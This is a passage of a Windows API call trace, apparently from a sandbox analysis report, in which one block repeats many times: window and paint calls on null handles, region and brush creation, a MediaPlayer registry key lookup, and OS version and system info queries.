out: lpRect=0x1817ac) returned 0 [0091.047] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.047] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.047] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.047] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.047] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc50401dc [0091.047] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc70401d9 [0091.047] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a38 [0091.047] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a39 [0091.047] CombineRgn (hrgnDst=0x1045a38, hrgnSrc1=0xc50401dc, hrgnSrc2=0xc70401d9, iMode=1) returned 1 [0091.047] CombineRgn (hrgnDst=0x1045a39, hrgnSrc1=0xc50401dc, hrgnSrc2=0xc70401d9, iMode=4) returned 2 [0091.047] CreateSolidBrush (color=0xff) returned 0x2105a37 [0091.047] CreateSolidBrush (color=0xff0000) returned 0x1105a3a [0091.047] DeleteObject (ho=0x1105a3a) returned 1 [0091.047] DeleteObject (ho=0xc70401d9) returned 1 [0091.047] DeleteObject (ho=0xc50401dc) returned 1 [0091.047] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.047] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.048] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.048] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.048] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.048] BeginPath (hdc=0x0) returned 0 [0091.048] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.048] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.048] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.048] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.048] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.048] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.048] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.048] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.048] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc80401d9 [0091.048] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc60401dc [0091.048] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a3b [0091.048] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a3c [0091.048] CombineRgn (hrgnDst=0x1045a3b, hrgnSrc1=0xc80401d9, hrgnSrc2=0xc60401dc, iMode=1) returned 1 [0091.048] CombineRgn (hrgnDst=0x1045a3c, hrgnSrc1=0xc80401d9, hrgnSrc2=0xc60401dc, iMode=4) returned 2 [0091.048] CreateSolidBrush (color=0xff) returned 0x2105a3a [0091.048] CreateSolidBrush (color=0xff0000) returned 0x1105a3d [0091.048] DeleteObject (ho=0x1105a3d) returned 1 [0091.048] DeleteObject (ho=0xc60401dc) returned 1 [0091.048] DeleteObject (ho=0xc80401d9) returned 1 [0091.048] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.048] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.048] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.048] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.049] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.049] BeginPath (hdc=0x0) returned 0 [0091.049] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.049] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.049] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.049] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.049] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.049] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.049] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.049] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.049] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc70401dc [0091.049] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc90401d9 [0091.049] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a3e [0091.049] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a3f [0091.049] CombineRgn (hrgnDst=0x1045a3e, hrgnSrc1=0xc70401dc, hrgnSrc2=0xc90401d9, iMode=1) returned 1 [0091.049] CombineRgn (hrgnDst=0x1045a3f, hrgnSrc1=0xc70401dc, hrgnSrc2=0xc90401d9, iMode=4) returned 2 [0091.049] CreateSolidBrush (color=0xff) returned 0x2105a3d [0091.049] CreateSolidBrush (color=0xff0000) returned 0x1105a40 [0091.049] DeleteObject (ho=0x1105a40) returned 1 [0091.049] DeleteObject (ho=0xc90401d9) returned 1 [0091.049] DeleteObject (ho=0xc70401dc) returned 1 [0091.049] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.049] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.049] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.049] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.049] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.049] BeginPath (hdc=0x0) returned 0 [0091.049] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.050] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.050] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.050] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.050] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.050] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.050] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.050] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.050] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xca0401d9 [0091.050] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc80401dc [0091.050] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a41 [0091.050] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a42 [0091.050] CombineRgn (hrgnDst=0x1045a41, hrgnSrc1=0xca0401d9, hrgnSrc2=0xc80401dc, iMode=1) returned 1 [0091.050] CombineRgn (hrgnDst=0x1045a42, hrgnSrc1=0xca0401d9, hrgnSrc2=0xc80401dc, iMode=4) returned 2 [0091.050] CreateSolidBrush (color=0xff) returned 0x2105a40 [0091.050] CreateSolidBrush (color=0xff0000) returned 0x1105a43 [0091.050] DeleteObject (ho=0x1105a43) returned 1 [0091.050] DeleteObject (ho=0xc80401dc) returned 1 [0091.050] DeleteObject (ho=0xca0401d9) returned 1 [0091.050] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.050] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.050] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.050] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.050] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.050] BeginPath (hdc=0x0) returned 0 [0091.050] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.050] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.050] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.050] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.050] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.051] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.051] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.051] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.051] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc90401dc [0091.051] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcb0401d9 [0091.051] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a44 [0091.051] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a45 [0091.051] CombineRgn (hrgnDst=0x1045a44, hrgnSrc1=0xc90401dc, hrgnSrc2=0xcb0401d9, iMode=1) returned 1 [0091.051] CombineRgn (hrgnDst=0x1045a45, hrgnSrc1=0xc90401dc, hrgnSrc2=0xcb0401d9, iMode=4) returned 2 [0091.051] CreateSolidBrush (color=0xff) returned 0x2105a43 [0091.051] CreateSolidBrush (color=0xff0000) returned 0x1105a46 [0091.051] DeleteObject (ho=0x1105a46) returned 1 [0091.051] DeleteObject (ho=0xcb0401d9) returned 1 [0091.051] DeleteObject (ho=0xc90401dc) returned 1 [0091.051] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.051] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.051] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.051] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.051] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.051] BeginPath (hdc=0x0) returned 0 [0091.051] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.051] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.051] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.051] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.051] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.051] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.052] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.052] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.052] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcc0401d9 [0091.052] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xca0401dc [0091.052] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a47 [0091.052] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a48 [0091.052] CombineRgn (hrgnDst=0x1045a47, hrgnSrc1=0xcc0401d9, hrgnSrc2=0xca0401dc, iMode=1) returned 1 [0091.052] CombineRgn (hrgnDst=0x1045a48, hrgnSrc1=0xcc0401d9, hrgnSrc2=0xca0401dc, iMode=4) returned 2 [0091.052] CreateSolidBrush (color=0xff) returned 0x2105a46 [0091.052] CreateSolidBrush (color=0xff0000) returned 0x1105a49 [0091.052] DeleteObject (ho=0x1105a49) returned 1 [0091.052] DeleteObject (ho=0xca0401dc) returned 1 [0091.052] DeleteObject (ho=0xcc0401d9) returned 1 [0091.052] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.052] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.052] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.052] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.052] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.052] BeginPath (hdc=0x0) returned 0 [0091.052] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.052] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.052] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.052] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.052] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.052] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.052] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.052] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.053] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcb0401dc [0091.053] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcd0401d9 [0091.053] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a4a [0091.053] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a4b [0091.053] CombineRgn (hrgnDst=0x1045a4a, hrgnSrc1=0xcb0401dc, hrgnSrc2=0xcd0401d9, iMode=1) returned 1 [0091.053] CombineRgn (hrgnDst=0x1045a4b, hrgnSrc1=0xcb0401dc, hrgnSrc2=0xcd0401d9, iMode=4) returned 2 [0091.053] CreateSolidBrush (color=0xff) returned 0x2105a49 [0091.053] CreateSolidBrush (color=0xff0000) returned 0x1105a4c [0091.053] DeleteObject (ho=0x1105a4c) returned 1 [0091.053] DeleteObject (ho=0xcd0401d9) returned 1 [0091.053] DeleteObject (ho=0xcb0401dc) returned 1 [0091.053] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.053] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.053] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.053] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.053] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.053] BeginPath (hdc=0x0) returned 0 [0091.053] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.053] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.053] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.053] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.053] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.053] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.053] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.054] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xce0401d9 [0091.054] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcc0401dc [0091.054] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a4d [0091.054] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a4e [0091.054] CombineRgn (hrgnDst=0x1045a4d, hrgnSrc1=0xce0401d9, hrgnSrc2=0xcc0401dc, iMode=1) returned 1 [0091.054] CombineRgn (hrgnDst=0x1045a4e, hrgnSrc1=0xce0401d9, hrgnSrc2=0xcc0401dc, iMode=4) returned 2 [0091.054] CreateSolidBrush (color=0xff) returned 0x2105a4c [0091.054] CreateSolidBrush (color=0xff0000) returned 0x1105a4f [0091.054] DeleteObject (ho=0x1105a4f) returned 1 [0091.054] DeleteObject (ho=0xcc0401dc) returned 1 [0091.054] DeleteObject (ho=0xce0401d9) returned 1 [0091.054] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.054] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.054] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.054] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.054] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.054] BeginPath (hdc=0x0) returned 0 [0091.054] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.054] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.054] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.054] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.054] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.054] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.054] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.054] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.055] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcd0401dc [0091.055] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcf0401d9 [0091.055] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a50 [0091.055] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a51 [0091.055] CombineRgn (hrgnDst=0x1045a50, hrgnSrc1=0xcd0401dc, hrgnSrc2=0xcf0401d9, iMode=1) returned 1 [0091.055] CombineRgn (hrgnDst=0x1045a51, hrgnSrc1=0xcd0401dc, hrgnSrc2=0xcf0401d9, iMode=4) returned 2 [0091.055] CreateSolidBrush (color=0xff) returned 0x2105a4f [0091.055] CreateSolidBrush (color=0xff0000) returned 0x1105a52 [0091.055] DeleteObject (ho=0x1105a52) returned 1 [0091.055] DeleteObject (ho=0xcf0401d9) returned 1 [0091.055] DeleteObject (ho=0xcd0401dc) returned 1 [0091.055] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.055] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.055] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.055] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.055] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.055] BeginPath (hdc=0x0) returned 0 [0091.055] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.055] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.055] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.055] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.055] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.055] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.055] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.055] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.056] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd00401d9 [0091.056] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xce0401dc [0091.056] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a53 [0091.056] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a54 [0091.056] CombineRgn (hrgnDst=0x1045a53, 